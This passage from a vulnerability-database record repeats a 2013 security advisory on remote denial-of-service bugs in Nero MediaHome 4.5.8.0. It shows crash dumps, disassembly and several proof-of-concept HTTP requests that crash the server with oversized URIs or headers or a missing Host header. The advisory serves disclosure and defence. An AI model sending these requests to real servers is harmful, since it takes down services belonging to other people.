03c1bb78 ( 63028088) -> >>#H\"G^^^^o^I@_lhf19fPf36dLa (heap)\r\n+08: 00000000 ( 0) -> N/A\r\n+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)\r\n+10: 7c92084c (2089945164) -> N/A\r\n+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c9209fe mov al,[esi+0x5]\r\n 0x7c920a01 and al,0x10\r\n 0x7c920a03 test al,0x10\r\n 0x7c920a05 mov [edi+0x5],al\r\n 0x7c920a08 jnz 0x7c920aa0\r\n 0x7c920a0e mov ecx,[esi+0xc]\r\n 0x7c920a11 lea eax,[esi+0x8]\r\n 0x7c920a14 mov edx,[eax]\r\n 0x7c920a16 mov [ebp+0xc],ecx\r\n 0x7c920a19 mov ecx,[ecx]\r\n 
0x7c920a1b cmp ecx,[edx+0x4]\r\n 0x7c920a1e mov [ebp+0x14],edx\r\n 0x7c920a21 jnz 0x7c921752\r\n 0x7c920a27 cmp ecx,eax\r\n 0x7c920a29 jnz 0x7c921752\r\n 0x7c920a2f push esi\r\n 0x7c920a30 push ebx\r\n 0x7c920a31 call 0x7c920684\r\n 0x7c920a36 mov eax,[ebp+0x14]\r\n 0x7c920a39 mov ecx,[ebp+0xc]\r\n 0x7c920a3c cmp eax,ecx\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nOPTIONS / [A * 265712]\r\nHost: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nReferer: http://www.host.com\r\n\r\n\r\n\r\n1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. \r\n\r\nCrash details:\r\n\r\nEIP: 7c920a19 mov ecx,[ecx]\r\nEAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\r\nEBX: 003e0000 ( 4063232) -> Tp@>+ (heap)\r\nECX: 41414141 (1094795585) -> N/A\r\nEDX: 41414141 (1094795585) -> N/A\r\nEDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)\r\nESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\r\nEBP: 0527f828 ( 86505512) -> `' (stack)\r\nESP: 0527f81c ( 86505500) -> 
>!>`'|VAAAAT'A>>B'$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' | (stack)\r\n +00: 003e0000 ( 4063232) -> Tp@>+ (heap)\r\n +04: 00000021 ( 33) -> N/A\r\n +08: 003e0004 ( 4063236) -> Tp@>+ (heap)\r\n +0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' |>@'X`4' |`| (stack)\r\n +10: 7c928ccd (2089979085) -> N/A\r\n +14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c9209f8 jnz 0x7c95af5f\r\n 0x7c9209fe mov al,[esi+0x5]\r\n 0x7c920a01 and al,0x10\r\n 0x7c920a03 test al,0x10\r\n 0x7c920a05 mov [edi+0x5],al\r\n 0x7c920a08 jnz 0x7c920aa0\r\n 0x7c920a0e mov ecx,[esi+0xc]\r\n 0x7c920a11 lea eax,[esi+0x8]\r\n 0x7c920a14 mov edx,[eax]\r\n 0x7c920a16 mov [ebp+0xc],ecx\r\n 0x7c920a19 mov ecx,[ecx]\r\n 0x7c920a1b cmp ecx,[edx+0x4]\r\n 0x7c920a1e mov [ebp+0x14],edx\r\n 0x7c920a21 jnz 0x7c921752\r\n 0x7c920a27 cmp ecx,eax\r\n 0x7c920a29 jnz 0x7c921752\r\n 0x7c920a2f push esi\r\n 0x7c920a30 push ebx\r\n 0x7c920a31 call 0x7c920684\r\n 0x7c920a36 mov eax,[ebp+0x14]\r\n 0x7c920a39 mov ecx,[ebp+0xc]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nGET / HTTP/1.1\r\nHost: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer:[A * 265566]\r\n\r\n\r\n\r\n2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877\r\n\r\n2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. 
The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.\r\n\r\nCrash details:\r\n\r\nEIP: 10003171 mov [eax+0x18],ebp\r\n EAX: 00000000 ( 0) -> N/A\r\n EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\r\n ECX: 039cddea ( 60612074) -> localhost (heap)\r\n EDX: 039cddea ( 60612074) -> localhost (heap)\r\n EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)\r\n ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)\r\n EBP: 00000009 ( 9) -> N/A\r\n ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)\r\n +00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\r\n +04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)\r\n +08: 00000000 ( 0) -> N/A\r\n +0c: 00000001 ( 1) -> N/A\r\n +10: 000000b8 ( 184) -> N/A\r\n +14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x10003156 mov edx,[esi+0x8]\r\n 0x10003159 mov ebp,[esi+0xc]\r\n 0x1000315c push byte 0x1\r\n 0x1000315e push eax\r\n 0x1000315f push ecx\r\n 0x10003160 push ebx\r\n 0x10003161 mov [edi+0x40],esi\r\n 0x10003164 mov [esp+0x2c],edx\r\n 0x10003168 call 0x10002730\r\n 0x1000316d mov ecx,[esp+0x2c]\r\n 0x10003171 mov [eax+0x18],ebp\r\n 0x10003174 mov ebp,[esp+0x24]\r\n 0x10003178 add esp,0x10\r\n 0x1000317b mov [eax+0x14],ecx\r\n 0x1000317e mov edx,[ebp+0x8]\r\n 0x10003181 test edx,edx\r\n 0x10003183 mov [esp+0x14],edx\r\n 0x10003187 jnz 0x10002ff0\r\n 0x1000318d mov eax,[esp+0x24]\r\n 0x10003191 push eax\r\n 0x10003192 call 0x10002c20\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash Nero MediaHome server remotely:\r\n\r\nGET / HTTP/1.1\r\n: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer: 
http://www.host.com\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nVendor last response (January 9, 2013):\r\n\"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon.\"\r\n\r\nAs a temporary solution it is advised to remove the vulnerable application from your system.\r\n\r\n-----------------------------------------------------------------------------------------------\n\n# 0day.today [2018-01-04] #", "sourceHref": "https://0day.today/exploit/20143", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:37", "description": "\nNero MediaHome 4.5.8.0 - Denial of Service", "edition": 2, "published": "2013-01-10T00:00:00", "title": "Nero MediaHome 4.5.8.0 - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "modified": "2013-01-10T00:00:00", "id": "EXPLOITPACK:84B8B4D7CE121A11D90EAFE9250FF34E", "href": "", "sourceData": "Advisory ID: HTB23130\nProduct: Nero MediaHome\nVendor: Nero\nVulnerable Version(s): 4.5.8.0 and probably prior\nTested Version: 4.5.8.0 in Windows 7 SP1\nVendor Notification: November 21, 2012 \nPublic Disclosure: January 9, 2013 \nVulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]\nCVE 
References: CVE-2012-5876, CVE-2012-5877\nCVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)\nRisk Level: Low \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.\n\n\n1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876\n\n1.1 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.\n\nCrash details:\n\nEIP: 7c921689 mov ecx,[ecx]\nEAX: 03b2a808 ( 62040072) -> (heap)\nEBX: 003e0000 ( 4063232) -> b@>@>\" (heap)\nECX: 00000000 ( 0) -> N/A\nEDX: 00000000 ( 0) -> N/A\nEDI: 03b2b000 ( 62042112) -> D (heap)\nESI: 03b2a800 ( 62040064) -> (heap)\nEBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. (stack)\nESP: 0526f848 ( 86440008) -> >\">&|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>. (stack)\n+00: 003e0000 ( 4063232) -> b@>@>\" (heap)\n+04: 00000022 ( 34) -> N/A\n+08: 003e0004 ( 4063236) -> b@>@>\" (heap)\n+0c: 0526f88c ( 86440076) -> &$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. 
D&|>|>|h& (stack)\n+10: 7c928ccd (2089979085) -> N/A\n+14: 00000000 ( 0) -> N/A\n\n\nDisasm around:\n\n 0x7c921664 mov ecx,[ebp+0x10]\n 0x7c921667 add eax,[ecx]\n 0x7c921669 cmp eax,0xfe00\n 0x7c92166e ja 0x7c920721\n 0x7c921674 cmp byte [ebp+0x14],0x0\n 0x7c921678 jnz 0x7c95ae10\n 0x7c92167e mov ecx,[esi+0xc]\n 0x7c921681 lea eax,[esi+0x8]\n 0x7c921684 mov edx,[eax]\n 0x7c921686 mov [ebp+0x8],ecx\n 0x7c921689 mov ecx,[ecx]\n 0x7c92168b cmp ecx,[edx+0x4]\n 0x7c92168e mov [ebp+0xc],edx\n 0x7c921691 jnz 0x7c921734\n 0x7c921697 cmp ecx,eax\n 0x7c921699 jnz 0x7c921734\n 0x7c92169f push esi\n 0x7c9216a0 push ebx\n 0x7c9216a1 call 0x7c920684\n 0x7c9216a6 mov eax,[ebp+0xc]\n 0x7c9216a9 mov ecx,[ebp+0x8]\n\n\nProof of Concept:\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\n\nGET /[A * 500000] HTTP/1.1\nHOST: somehost.com\nACCEPT: */*\nAccept-Encoding: None\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\nConnection: Close\nAccept-Transfer-Encoding: None\n\n\n\n1.2 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. 
A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.\n\nCrash details:\n\nEIP: 7c921689 mov ecx,[ecx]\nEAX: 03b63008 ( 62271496) -> (heap)\nEBX: 003e0000 ( 4063232) -> # 8@>+ (heap)\nECX: 00000000 ( 0) -> N/A\nEDX: 00000000 ( 0) -> N/A\nEDI: 03b64000 ( 62275584) -> B (heap)\nESI: 03b63000 ( 62271488) -> (heap)\nEBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]| (stack)\nESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' | (stack)\n+00: 003e0000 ( 4063232) -> # 8@>+ (heap)\n+04: 00000021 ( 33) -> N/A\n+08: 003e0004 ( 4063236) -> # 8@>+ (heap)\n+0c: 0527f89c ( 86505628) -> '$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)\n+10: 7c928ccd (2089979085) -> N/A\n+14: 00000000 ( 0) -> N/A\n\n\nDisasm around:\n\n 0x7c921664 mov ecx,[ebp+0x10]\n 0x7c921667 add eax,[ecx]\n 0x7c921669 cmp eax,0xfe00\n 0x7c92166e ja 0x7c920721\n 0x7c921674 cmp byte [ebp+0x14],0x0\n 0x7c921678 jnz 0x7c95ae10\n 0x7c92167e mov ecx,[esi+0xc]\n 0x7c921681 lea eax,[esi+0x8]\n 0x7c921684 mov edx,[eax]\n 0x7c921686 mov [ebp+0x8],ecx\n 0x7c921689 mov ecx,[ecx]\n 0x7c92168b cmp ecx,[edx+0x4]\n 0x7c92168e mov [ebp+0xc],edx\n 0x7c921691 jnz 0x7c921734\n 0x7c921697 cmp ecx,eax\n 0x7c921699 jnz 0x7c921734\n 0x7c92169f push esi\n 0x7c9216a0 push ebx\n 0x7c9216a1 call 0x7c920684\n 0x7c9216a6 mov eax,[ebp+0xc]\n 0x7c9216a9 mov ecx,[ebp+0x8]\n\n\nProof of Concept:\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\n\nHEAD / [A * 265696] HTTP/1.1\nACCEPT: */*\nAccept-Encoding: None\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\nConnection: Close\nAccept-Transfer-Encoding: None\n\n\n\n1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the \"NMMediaServer.dll\" dynamic-link library. 
A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.\n\nCrash details:\n\nEIP: 7c920a1b cmp ecx,[edx+0x4]\nEAX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\nEBX: 003e0000 ( 4063232) -> @>+ (heap)\nECX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\nEDX: 03b50101 ( 62193921) -> N/A\nEDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H\"G^^^^o^I@_l (heap)\nESI: 03c1bb88 ( 63028104) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\nEBP: 033bfc78 ( 54262904) -> L;L (stack)\nESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)\n+00: 003e0000 ( 4063232) -> @>+ (heap)\n+04: 03c1bb78 ( 63028088) -> >>#H\"G^^^^o^I@_lhf19fPf36dLa (heap)\n+08: 00000000 ( 0) -> N/A\n+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)\n+10: 7c92084c (2089945164) -> N/A\n+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)\n\n\nDisasm around:\n\n 0x7c9209fe mov al,[esi+0x5]\n 0x7c920a01 and al,0x10\n 0x7c920a03 test al,0x10\n 0x7c920a05 mov [edi+0x5],al\n 0x7c920a08 jnz 0x7c920aa0\n 0x7c920a0e mov ecx,[esi+0xc]\n 0x7c920a11 lea eax,[esi+0x8]\n 0x7c920a14 mov edx,[eax]\n 0x7c920a16 mov [ebp+0xc],ecx\n 0x7c920a19 mov ecx,[ecx]\n 0x7c920a1b cmp ecx,[edx+0x4]\n 0x7c920a1e mov [ebp+0x14],edx\n 0x7c920a21 jnz 0x7c921752\n 0x7c920a27 cmp ecx,eax\n 0x7c920a29 jnz 0x7c921752\n 0x7c920a2f push esi\n 0x7c920a30 push ebx\n 0x7c920a31 call 0x7c920684\n 0x7c920a36 mov eax,[ebp+0x14]\n 0x7c920a39 mov ecx,[ebp+0xc]\n 0x7c920a3c cmp eax,ecx\n\n\nProof of Concept:\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\n\nOPTIONS / [A * 265712]\nHost: somehost.com\nUser-Agent: Mozilla/5.0 (Windows; U)\nAccept-Language: en-us,en;q=0.5\nKeep-Alive: 300\nReferer: http://www.host.com\n\n\n\n1.4 The vulnerability exists due to improper handling 
of the HTTP REFERER header length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. \n\nCrash details:\n\nEIP: 7c920a19 mov ecx,[ecx]\nEAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\nEBX: 003e0000 ( 4063232) -> Tp@>+ (heap)\nECX: 41414141 (1094795585) -> N/A\nEDX: 41414141 (1094795585) -> N/A\nEDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)\nESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\nEBP: 0527f828 ( 86505512) -> `' (stack)\nESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' | (stack)\n +00: 003e0000 ( 4063232) -> Tp@>+ (heap)\n +04: 00000021 ( 33) -> N/A\n +08: 003e0004 ( 4063236) -> Tp@>+ (heap)\n +0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' |>@'X`4' |`| (stack)\n +10: 7c928ccd (2089979085) -> N/A\n +14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)\n\n\nDisasm around:\n\n 0x7c9209f8 jnz 0x7c95af5f\n 0x7c9209fe mov al,[esi+0x5]\n 0x7c920a01 and al,0x10\n 0x7c920a03 test al,0x10\n 0x7c920a05 mov [edi+0x5],al\n 0x7c920a08 jnz 0x7c920aa0\n 0x7c920a0e mov ecx,[esi+0xc]\n 0x7c920a11 lea eax,[esi+0x8]\n 0x7c920a14 mov edx,[eax]\n 0x7c920a16 mov [ebp+0xc],ecx\n 0x7c920a19 mov ecx,[ecx]\n 
0x7c920a1b cmp ecx,[edx+0x4]\n 0x7c920a1e mov [ebp+0x14],edx\n 0x7c920a21 jnz 0x7c921752\n 0x7c920a27 cmp ecx,eax\n 0x7c920a29 jnz 0x7c921752\n 0x7c920a2f push esi\n 0x7c920a30 push ebx\n 0x7c920a31 call 0x7c920684\n 0x7c920a36 mov eax,[ebp+0x14]\n 0x7c920a39 mov ecx,[ebp+0xc]\n\n\nProof of Concept:\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\n\nGET / HTTP/1.1\nHost: somehost.com\nUser-Agent: Mozilla/5.0 (Windows; U)\nAccept-Language: en-us,en;q=0.5\nKeep-Alive: 300\nConnection: keep-alive\nReferer:[A * 265566]\n\n\n\n2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877\n\n2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.\n\nCrash details:\n\nEIP: 10003171 mov [eax+0x18],ebp\n EAX: 00000000 ( 0) -> N/A\n EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\n ECX: 039cddea ( 60612074) -> localhost (heap)\n EDX: 039cddea ( 60612074) -> localhost (heap)\n EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)\n ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)\n EBP: 00000009 ( 9) -> N/A\n ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)\n +00: 037bd090 ( 58445968) -> x4xx @R px?x? 
(heap)\n +04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)\n +08: 00000000 ( 0) -> N/A\n +0c: 00000001 ( 1) -> N/A\n +10: 000000b8 ( 184) -> N/A\n +14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)\n\n\nDisasm around:\n\n 0x10003156 mov edx,[esi+0x8]\n 0x10003159 mov ebp,[esi+0xc]\n 0x1000315c push byte 0x1\n 0x1000315e push eax\n 0x1000315f push ecx\n 0x10003160 push ebx\n 0x10003161 mov [edi+0x40],esi\n 0x10003164 mov [esp+0x2c],edx\n 0x10003168 call 0x10002730\n 0x1000316d mov ecx,[esp+0x2c]\n 0x10003171 mov [eax+0x18],ebp\n 0x10003174 mov ebp,[esp+0x24]\n 0x10003178 add esp,0x10\n 0x1000317b mov [eax+0x14],ecx\n 0x1000317e mov edx,[ebp+0x8]\n 0x10003181 test edx,edx\n 0x10003183 mov [esp+0x14],edx\n 0x10003187 jnz 0x10002ff0\n 0x1000318d mov eax,[esp+0x24]\n 0x10003191 push eax\n 0x10003192 call 0x10002c20\n\n\nProof of Concept:\nThe following HTTP request will crash Nero MediaHome server remotely:\n\nGET / HTTP/1.1\n: somehost.com\nUser-Agent: Mozilla/5.0 (Windows; U)\nAccept-Language: en-us,en;q=0.5\nKeep-Alive: 300\nConnection: keep-alive\nReferer: http://www.host.com\n\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nVendor last response (January 9, 2013):\n\"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon.\"\n\nAs a temporary solution it is advised to remove the vulnerable application from your system.\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23130 - https://www.htbridge.com/advisory/HTB23130 - Nero MediaHome Server Multiple Remote DoS vulnerabilities.\n[2] Nero - http://www.nero.com - Nero MediaHome server easily distributes music, videos and photos over your 
network.\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:44", "description": "", "published": "2013-01-10T00:00:00", "type": "packetstorm", "title": "Nero MediaHome 4.5.8.0 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "modified": "2013-01-10T00:00:00", "id": "PACKETSTORM:119424", "href": "https://packetstormsecurity.com/files/119424/Nero-MediaHome-4.5.8.0-Denial-Of-Service.html", "sourceData": "`Advisory ID: HTB23130 \nProduct: Nero MediaHome \nVendor: Nero \nVulnerable Version(s): 4.5.8.0 and probably prior \nTested Version: 4.5.8.0 in Windows 7 SP1 \nVendor Notification: November 21, 2012 \nPublic Disclosure: January 9, 2013 \nVulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236] \nCVE References: CVE-2012-5876, CVE-2012-5877 \nCVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P) \nRisk Level: Low \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n 
\n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely. \n \n \n1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876 \n \n1.1 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server. \n \nCrash details: \n \nEIP: 7c921689 mov ecx,[ecx] \nEAX: 03b2a808 ( 62040072) -> (heap) \nEBX: 003e0000 ( 4063232) -> b@>@>\" (heap) \nECX: 00000000 ( 0) -> N/A \nEDX: 00000000 ( 0) -> N/A \nEDI: 03b2b000 ( 62042112) -> D (heap) \nESI: 03b2a800 ( 62040064) -> (heap) \nEBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. (stack) \nESP: 0526f848 ( 86440008) -> >\">&|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>. (stack) \n+00: 003e0000 ( 4063232) -> b@>@>\" (heap) \n+04: 00000022 ( 34) -> N/A \n+08: 003e0004 ( 4063236) -> b@>@>\" (heap) \n+0c: 0526f88c ( 86440076) -> &$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. 
